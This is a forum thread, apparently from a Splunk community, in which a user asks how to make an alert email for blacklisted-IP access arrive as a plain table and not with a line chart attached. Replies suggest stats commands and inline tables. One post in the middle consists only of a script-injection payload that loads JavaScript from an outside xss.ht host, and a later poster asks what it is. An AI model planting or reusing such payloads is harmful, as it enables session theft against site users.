Hello All,
I have several alerts which send email notifications.
I know it might be very basic, but I need your help.
One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port 
The search returns a table, but I do not understand why it attaches a line-chart diagram!
I want it as a static table. In the Visualization tab, it does not show me a static table. I even tried to create a new alert without even going to the Visualization tab, but I got the same result.
I have even changed the search and used Table instead of stats.
Please advise.
Thank you
Hi,
search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"
chart is like:
Which I do not need.
For now, as a workaround, I managed to not attach the PDF and use the inline table.
Is it the only way to do this?
Thank you
Maybe you can change your table + dedup to
...
| stats count by Src, Dst, pt
...
And as you said, don't attach the PDF etc. to the alert email, just link and/or inline.
r. Ismo
"><script src=https://shivamraixssht.xss.ht></script>
Hi,
Sorry, I am afraid I did not get what this is.
Would you please elaborate?
Thank you
Yes, I was using this stats command.
My concern is about the chart, so it seems this is the only way:
to not attach PDF and include the Table inline.
Thank you very much
Can anyone assist, please?
Can you post your query + those visualisations?
I have added the search and chart, but it seems to be at the wrong level.
Please check.
Thank you
